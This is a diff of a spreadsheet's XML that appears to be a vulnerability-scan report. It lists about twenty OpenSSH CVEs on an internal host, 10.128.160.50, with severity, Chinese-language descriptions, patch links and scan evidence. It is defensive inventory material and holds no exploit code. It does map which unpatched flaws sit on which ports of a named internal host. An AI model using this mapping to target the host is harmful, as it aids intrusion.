       <c r="G10" t="inlineStr">
@@ -1519,7 +1515,7 @@
       </c>
       <c r="J10" t="inlineStr">
         <is>
-          <t>CVE-2016-6515</t>
+          <t>CVE-2021-28041</t>
         </is>
       </c>
       <c r="K10" t="inlineStr">
@@ -1589,7 +1585,7 @@
     <row r="11">
       <c r="A11" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
+          <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
         </is>
       </c>
       <c r="B11" t="inlineStr">
@@ -1602,16 +1598,20 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D11" t="inlineStr"/>
+      <c r="D11" t="inlineStr">
+        <is>
+          <t>拒绝服务</t>
+        </is>
+      </c>
       <c r="E11" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
         </is>
       </c>
       <c r="F11" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH before 8.5 存在安全漏洞，攻击者可利用该漏洞在遗留操作系统上不受约束的代理套接字访问。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.3之前的版本中的sshd中的auth-passwd.c文件中的‘auth_password’函数存在输入验证错误漏洞，该漏洞源于程序没有在密码验证中限制密码长度。远程攻击者可借助长的字符串利用该漏洞造成拒绝服务(CPU消耗)。</t>
         </is>
       </c>
       <c r="G11" t="inlineStr">
@@ -1631,7 +1631,7 @@
       </c>
       <c r="J11" t="inlineStr">
         <is>
-          <t>CVE-2021-28041</t>
+          <t>CVE-2016-6515</t>
         </is>
       </c>
       <c r="K11" t="inlineStr">
@@ -1701,7 +1701,7 @@
     <row r="12">
       <c r="A12" t="inlineStr">
         <is>
-          <t>OpenSSH 信息泄漏漏洞(CVE-2018-15919)</t>
+          <t>OpenSSH Maxauthtries限制绕过漏洞(CVE-2015-5600)</t>
         </is>
       </c>
       <c r="B12" t="inlineStr">
@@ -1711,22 +1711,22 @@
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D12" t="inlineStr">
         <is>
-          <t>信息泄露</t>
+          <t>越权访问</t>
         </is>
       </c>
       <c r="E12" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
         </is>
       </c>
       <c r="F12" t="inlineStr">
         <is>
-          <t>OpenSSH 7.8及之前版本中的auth-gss2.c文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。</t>
+          <t>OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的keyboard-interactive设备。远程攻击者可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务（CPU消耗）。</t>
         </is>
       </c>
       <c r="G12" t="inlineStr">
@@ -1746,7 +1746,7 @@
       </c>
       <c r="J12" t="inlineStr">
         <is>
-          <t>CVE-2018-15919</t>
+          <t>CVE-2015-5600</t>
         </is>
       </c>
       <c r="K12" t="inlineStr">
@@ -1816,7 +1816,7 @@
     <row r="13">
       <c r="A13" t="inlineStr">
         <is>
-          <t>OpenSSH Maxauthtries限制绕过漏洞(CVE-2015-5600)</t>
+          <t>OpenSSH 信息泄漏漏洞(CVE-2018-15919)</t>
         </is>
       </c>
       <c r="B13" t="inlineStr">
@@ -1826,22 +1826,22 @@
       </c>
       <c r="C13" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D13" t="inlineStr">
         <is>
-          <t>越权访问</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E13" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F13" t="inlineStr">
         <is>
-          <t>OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的keyboard-interactive设备。远程攻击者可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务（CPU消耗）。</t>
+          <t>OpenSSH 7.8及之前版本中的auth-gss2.c文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
@@ -1861,7 +1861,7 @@
       </c>
       <c r="J13" t="inlineStr">
         <is>
-          <t>CVE-2015-5600</t>
+          <t>CVE-2018-15919</t>
         </is>
       </c>
       <c r="K13" t="inlineStr">
@@ -2398,7 +2398,7 @@
     <row r="18">
       <c r="A18" t="inlineStr">
         <is>
-          <t>ftp banner信息获取</t>
+          <t>OpenSSH cbc模式信息泄露漏洞(CVE-2008-5161)</t>
         </is>
       </c>
       <c r="B18" t="inlineStr">
@@ -2413,17 +2413,18 @@
       </c>
       <c r="D18" t="inlineStr">
         <is>
-          <t>信息发现</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E18" t="inlineStr">
         <is>
-          <t>非漏洞</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+https://downloads.ssh.com/</t>
         </is>
       </c>
       <c r="F18" t="inlineStr">
         <is>
-          <t>此插件用来获取ftp服务的banner信息</t>
+          <t>OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。如果配置为CBC模式的话，OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误，导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时，攻击者恢复32位纯文本的成功概率为2^{-18}，此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。</t>
         </is>
       </c>
       <c r="G18" t="inlineStr">
@@ -2441,7 +2442,11 @@
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J18" t="inlineStr"/>
+      <c r="J18" t="inlineStr">
+        <is>
+          <t>CVE-2008-5161</t>
+        </is>
+      </c>
       <c r="K18" t="inlineStr">
         <is>
           <t>2026-07-24 16:33</t>
@@ -2481,20 +2486,138 @@
       </c>
       <c r="T18" t="inlineStr">
         <is>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U18" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:22</t>
+        </is>
+      </c>
+      <c r="V18" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W18" t="inlineStr">
+        <is>
+          <t>页面url: http://10.128.160.50:22
+请求体: -
+响应体: -
+举证描述: 当前openssh为CBC模式，成功读取到泄露文本，检测存在漏洞</t>
+        </is>
+      </c>
+      <c r="X18" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y18" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>ftp banner信息获取</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t>建议修复</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t>信息发现</t>
+        </is>
+      </c>
+      <c r="E19" t="inlineStr">
+        <is>
+          <t>非漏洞</t>
+        </is>
+      </c>
+      <c r="F19" t="inlineStr">
+        <is>
+          <t>此插件用来获取ftp服务的banner信息</t>
+        </is>
+      </c>
+      <c r="G19" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H19" t="inlineStr">
+        <is>
+          <t>云镜-服务版</t>
+        </is>
+      </c>
+      <c r="I19" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J19" t="inlineStr"/>
+      <c r="K19" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="L19" t="inlineStr">
+        <is>
+          <t>2026-07-24 16:33</t>
+        </is>
+      </c>
+      <c r="M19" t="inlineStr">
+        <is>
+          <t>10.128.160.50</t>
+        </is>
+      </c>
+      <c r="N19" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O19" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P19" t="inlineStr"/>
+      <c r="Q19" t="inlineStr"/>
+      <c r="R19" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S19" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T19" t="inlineStr">
+        <is>
           <t>21</t>
         </is>
       </c>
-      <c r="U18" t="inlineStr">
+      <c r="U19" t="inlineStr">
         <is>
           <t>http://10.128.160.50:21</t>
         </is>
       </c>
-      <c r="V18" t="inlineStr">
+      <c r="V19" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="W18" t="inlineStr">
+      <c r="W19" t="inlineStr">
         <is>
           <t>页面url: http://10.128.160.50:21
 请求体: -
@@ -2502,129 +2625,6 @@
 举证描述: 成功获取ftp的banner信息</t>
         </is>
       </c>
-      <c r="X18" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y18" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="19">
-      <c r="A19" t="inlineStr">
-        <is>
-          <t>OpenSSH cbc模式信息泄露漏洞(CVE-2008-5161)</t>
-        </is>
-      </c>
-      <c r="B19" t="inlineStr">
-        <is>
-          <t>建议修复</t>
-        </is>
-      </c>
-      <c r="C19" t="inlineStr">
-        <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D19" t="inlineStr">
-        <is>
-          <t>信息泄露</t>
-        </is>
-      </c>
-      <c r="E19" t="inlineStr">
-        <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-https://downloads.ssh.com/</t>
-        </is>
-      </c>
-      <c r="F19" t="inlineStr">
-        <is>
-          <t>OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。如果配置为CBC模式的话，OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误，导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时，攻击者恢复32位纯文本的成功概率为2^{-18}，此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。</t>
-        </is>
-      </c>
-      <c r="G19" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
-      <c r="H19" t="inlineStr">
-        <is>
-          <t>云镜-服务版</t>
-        </is>
-      </c>
-      <c r="I19" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J19" t="inlineStr">
-        <is>
-          <t>CVE-2008-5161</t>
-        </is>
-      </c>
-      <c r="K19" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="L19" t="inlineStr">
-        <is>
-          <t>2026-07-24 16:33</t>
-        </is>
-      </c>
-      <c r="M19" t="inlineStr">
-        <is>
-          <t>10.128.160.50</t>
-        </is>
-      </c>
-      <c r="N19" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O19" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P19" t="inlineStr"/>
-      <c r="Q19" t="inlineStr"/>
-      <c r="R19" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S19" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T19" t="inlineStr">
-        <is>
-          <t>22</t>
-        </is>
-      </c>
-      <c r="U19" t="inlineStr">
-        <is>
-          <t>http://10.128.160.50:22</t>
-        </is>
-      </c>
-      <c r="V19" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W19" t="inlineStr">
-        <is>
-          <t>页面url: http://10.128.160.50:22
-请求体: -
-响应体: -
-举证描述: 当前openssh为CBC模式，成功读取到泄露文本，检测存在漏洞</t>
-        </is>
-      </c>
       <c r="X19" t="inlineStr">
         <is>
           <t>待处置</t>
@@ -2639,7 +2639,7 @@
     <row r="20">
       <c r="A20" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
+          <t>OpenSSH ssh-agent远程代码执行漏洞(CVE-2023-38408)</t>
         </is>
       </c>
       <c r="B20" t="inlineStr">
@@ -2652,15 +2652,21 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D20" t="inlineStr"/>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
       <c r="E20" t="inlineStr">
         <is>
-          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/security.html</t>
+          <t>该漏洞在OpenSSH 9.3p2版本中已得到修复。建议用户升级到最新版本。对于 OpenBSD，发布了一个勘误补丁来修复此问题。
+链接如下：https://www.openssh.com/releasenotes.html
+https://www.openbsd.org/errata.html</t>
         </is>
       </c>
       <c r="F20" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH存在安全漏洞。该漏洞源于允许权限提升，因为补充组未按预期初始化。</t>
+          <t>OpenSSH 的 ssh-agent 中存在了一个远程代码执行漏洞。此漏洞允许远程攻击者在存在漏洞的 OpenSSH的 forwarded ssh-agent 代理上执行任意命令。</t>
         </is>
       </c>
       <c r="G20" t="inlineStr">
@@ -2680,7 +2686,7 @@
       </c>
       <c r="J20" t="inlineStr">
         <is>
-          <t>CVE-2021-41617</t>
+          <t>CVE-2023-38408</t>
         </is>
       </c>
       <c r="K20" t="inlineStr">
@@ -2750,7 +2756,7 @@
     <row r="21">
       <c r="A21" t="inlineStr">
         <is>
-          <t>OpenSSH ssh-agent远程代码执行漏洞(CVE-2023-38408)</t>
+          <t>openssh 安全漏洞 (CVE-2023-48795)</t>
         </is>
       </c>
       <c r="B21" t="inlineStr">
@@ -2760,31 +2766,21 @@
       </c>
       <c r="C21" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D21" t="inlineStr">
-        <is>
-          <t>代码执行</t>
-        </is>
-      </c>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr"/>
       <c r="E21" t="inlineStr">
         <is>
-          <t>该漏洞在OpenSSH 9.3p2版本中已得到修复。建议用户升级到最新版本。对于 OpenBSD，发布了一个勘误补丁来修复此问题。
-链接如下：https://www.openssh.com/releasenotes.html
-https://www.openbsd.org/errata.html</t>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
         </is>
       </c>
       <c r="F21" t="inlineStr">
         <is>
-          <t>OpenSSH 的 ssh-agent 中存在了一个远程代码执行漏洞。此漏洞允许远程攻击者在存在漏洞的 OpenSSH的 forwarded ssh-agent 代理上执行任意命令。</t>
-        </is>
-      </c>
-      <c r="G21" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于允许远程攻击者绕过完整性检查，从而省略某些数据包。</t>
+        </is>
+      </c>
+      <c r="G21" t="inlineStr"/>
       <c r="H21" t="inlineStr">
         <is>
           <t>云镜-服务版</t>
@@ -2797,7 +2793,7 @@
       </c>
       <c r="J21" t="inlineStr">
         <is>
-          <t>CVE-2023-38408</t>
+          <t>CVE-2023-48795</t>
         </is>
       </c>
       <c r="K21" t="inlineStr">
@@ -2867,7 +2863,7 @@
     <row r="22">
       <c r="A22" t="inlineStr">
         <is>
-          <t>openssh 安全漏洞 (CVE-2023-48795)</t>
+          <t>OpenSSH命令注入漏洞(CVE-2023-51385)</t>
         </is>
       </c>
       <c r="B22" t="inlineStr">
@@ -2877,21 +2873,30 @@
       </c>
       <c r="C22" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D22" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D22" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
       <c r="E22" t="inlineStr">
         <is>
-          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：
+https://www.openssh.com/openbsd.html</t>
         </is>
       </c>
       <c r="F22" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于允许远程攻击者绕过完整性检查，从而省略某些数据包。</t>
-        </is>
-      </c>
-      <c r="G22" t="inlineStr"/>
+          <t>该漏洞是由于OpenSSH处理主机名称中的特殊符号不严谨，如果用户名或主机名中含有shell元字符（如 | ‘ “等），并且ssh_config中ProxyCommand、LocalCommand指令或”match exec”谓词通过%u、%h或类似的扩展标记引用用户或主机名时，可能会发生命令注入。攻击者可利用该漏洞在获得权限或钓鱼攻击的情况下，构造恶意数据执行命令注入攻击.</t>
+        </is>
+      </c>
+      <c r="G22" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
       <c r="H22" t="inlineStr">
         <is>
           <t>云镜-服务版</t>
@@ -2904,7 +2909,7 @@
       </c>
       <c r="J22" t="inlineStr">
         <is>
-          <t>CVE-2023-48795</t>
+          <t>CVE-2023-51385</t>
         </is>
       </c>
       <c r="K22" t="inlineStr">
@@ -2974,7 +2979,7 @@
     <row r="23">
       <c r="A23" t="inlineStr">
         <is>
-          <t>OpenSSH命令注入漏洞(CVE-2023-51385)</t>
+          <t>OpenSSH 安全漏洞(CVE-2016-0777)</t>
         </is>
       </c>
       <c r="B23" t="inlineStr">
@@ -2984,23 +2989,22 @@
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D23" t="inlineStr">
         <is>
-          <t>命令执行</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E23" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：
-https://www.openssh.com/openbsd.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>该漏洞是由于OpenSSH处理主机名称中的特殊符号不严谨，如果用户名或主机名中含有shell元字符（如 | ‘ “等），并且ssh_config中ProxyCommand、LocalCommand指令或”match exec”谓词通过%u、%h或类似的扩展标记引用用户或主机名时，可能会发生命令注入。攻击者可利用该漏洞在获得权限或钓鱼攻击的情况下，构造恶意数据执行命令注入攻击.</t>
+          <t>远程攻击者可通过请求传输整个缓冲区利用该漏洞获取进程内存中的敏感信息。</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -3020,7 +3024,7 @@
       </c>
       <c r="J23" t="inlineStr">
         <is>
-          <t>CVE-2023-51385</t>
+          <t>CVE-2016-0777</t>
         </is>
       </c>
       <c r="K23" t="inlineStr">
@@ -3090,7 +3094,7 @@
     <row r="24">
       <c r="A24" t="inlineStr">
         <is>
-          <t>OpenSSH xauth命令注入漏洞(CVE-2016-3115)</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
         </is>
       </c>
       <c r="B24" t="inlineStr">
@@ -3100,23 +3104,18 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D24" t="inlineStr">
-        <is>
-          <t>命令执行</t>
-        </is>
-      </c>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr"/>
       <c r="E24" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/x11fwd.adv</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/security.html</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.2p1及之前版本的sshd中的session.c文件中存在CRLF注入漏洞。远程攻击者可借助特制的X11转发数据利用该漏洞绕过既定的shell-command限制。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH存在安全漏洞。该漏洞源于允许权限提升，因为补充组未按预期初始化。</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -3136,7 +3135,7 @@
       </c>
       <c r="J24" t="inlineStr">
         <is>
-          <t>CVE-2016-3115</t>
+          <t>CVE-2021-41617</t>
         </is>
       </c>
       <c r="K24" t="inlineStr">
@@ -3206,7 +3205,7 @@
     <row r="25">
       <c r="A25" t="inlineStr">
         <is>
-          <t>OpenSSH sshd monitor.c文件权限许可和访问控制漏洞(CVE-2015-6564)</t>
+          <t>openssh 安全漏洞 (CVE-2023-51384)</t>
         </is>
       </c>
       <c r="B25" t="inlineStr">
@@ -3219,19 +3218,15 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D25" t="inlineStr">
-        <is>
-          <t>访问控制错误</t>
-        </is>
-      </c>
+      <c r="D25" t="inlineStr"/>
       <c r="E25" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
         </is>
       </c>
       <c r="F25" t="inlineStr">
         <is>
-          <t>基于non-OpenBSD平台的OpenSSH 7.0之前版本的sshd中的monitor.c文件中的‘mm_answer_pam_free_ctx’函数存在释放后重用漏洞。本地攻击者可通过控制sshd uid发送错误的MONITOR_REQ_PAM_FREE_CTX请求利用该漏洞获取权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于当在添加PKCS11托管私钥的过程中指定目标约束时，这些约束仅应用于第一个密钥。</t>
         </is>
       </c>
       <c r="G25" t="inlineStr">
@@ -3251,7 +3246,7 @@
       </c>
       <c r="J25" t="inlineStr">
         <is>
-          <t>CVE-2015-6564</t>
+          <t>CVE-2023-51384</t>
         </is>
       </c>
       <c r="K25" t="inlineStr">
@@ -3321,7 +3316,7 @@
     <row r="26">
       <c r="A26" t="inlineStr">
         <is>
-          <t>OpenSSH信息泄露漏洞(CVE-2020-14145)</t>
+          <t>OpenSSH x11_open_helper()函数安全限制绕过漏洞(CVE-2015-5352)</t>
         </is>
       </c>
       <c r="B26" t="inlineStr">
@@ -3336,18 +3331,18 @@
       </c>
       <c r="D26" t="inlineStr">
         <is>
-          <t>信息泄露</t>
+          <t>防御绕过</t>
         </is>
       </c>
       <c r="E26" t="inlineStr">
         <is>
-          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
-https://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/release-6.9</t>
         </is>
       </c>
       <c r="F26" t="inlineStr">
         <is>
-          <t>OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 5.7版本至8.4版本的客户端中存在信息泄露漏洞。攻击者可利用该漏洞获取信息。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 6.9之前版本的ssh中的channels.c文件中的‘x11_open_helper’函数存在安全漏洞，该漏洞源于程序禁用ForwardX11Trusted模式时，没有检查X连接的refusal deadline。远程攻击者可借助特制的连接利用该漏洞绕过既定的访问限制。</t>
         </is>
       </c>
       <c r="G26" t="inlineStr">
@@ -3367,7 +3362,7 @@
       </c>
       <c r="J26" t="inlineStr">
         <is>
-          <t>CVE-2020-14145</t>
+          <t>CVE-2015-5352</t>
         </is>
       </c>
       <c r="K26" t="inlineStr">
@@ -3437,33 +3432,32 @@
     <row r="27">
       <c r="A27" t="inlineStr">
         <is>
-          <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
+          <t>OpenSSH 访问限制绕过漏洞(CVE-2018-20685)</t>
         </is>
       </c>
       <c r="B27" t="inlineStr">
         <is>
-          <t>建议修复</t>
+          <t>尽快修复</t>
         </is>
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>低危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D27" t="inlineStr">
         <is>
-          <t>授权问题</t>
+          <t>越权访问</t>
         </is>
       </c>
       <c r="E27" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://www.openssh.com/security.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F27" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 
-OpenSSH 8.9 之前的版本中存在安全漏洞。该漏洞源于客户端使用带代理转发但没有 -oLogLevel=verbose 的公钥身份验证。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。scp Client是其中的一个SCP客户端。OpenSSH 7.9版本中的scp客户端的scp.c文件存在安全漏洞。远程攻击者可借助.文件名或空文件名利用该漏洞造成SSH服务器绕过访问限制。</t>
         </is>
       </c>
       <c r="G27" t="inlineStr">
@@ -3483,7 +3477,7 @@
       </c>
       <c r="J27" t="inlineStr">
         <is>
-          <t>CVE-2021-36368</t>
+          <t>CVE-2018-20685</t>
         </is>
       </c>
       <c r="K27" t="inlineStr">
@@ -3553,7 +3547,7 @@
     <row r="28">
       <c r="A28" t="inlineStr">
         <is>
-          <t>OpenSSH 访问限制绕过漏洞(CVE-2018-20685)</t>
+          <t>OpenSSH身份验证绕过漏洞(CVE-2023-51767)</t>
         </is>
       </c>
       <c r="B28" t="inlineStr">
@@ -3563,22 +3557,22 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D28" t="inlineStr">
         <is>
-          <t>越权访问</t>
+          <t>绕过认证</t>
         </is>
       </c>
       <c r="E28" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
+          <t>官方已发布新版本修复该漏洞，请根据具体发行版将openssh更新到最新版本。</t>
         </is>
       </c>
       <c r="F28" t="inlineStr">
         <is>
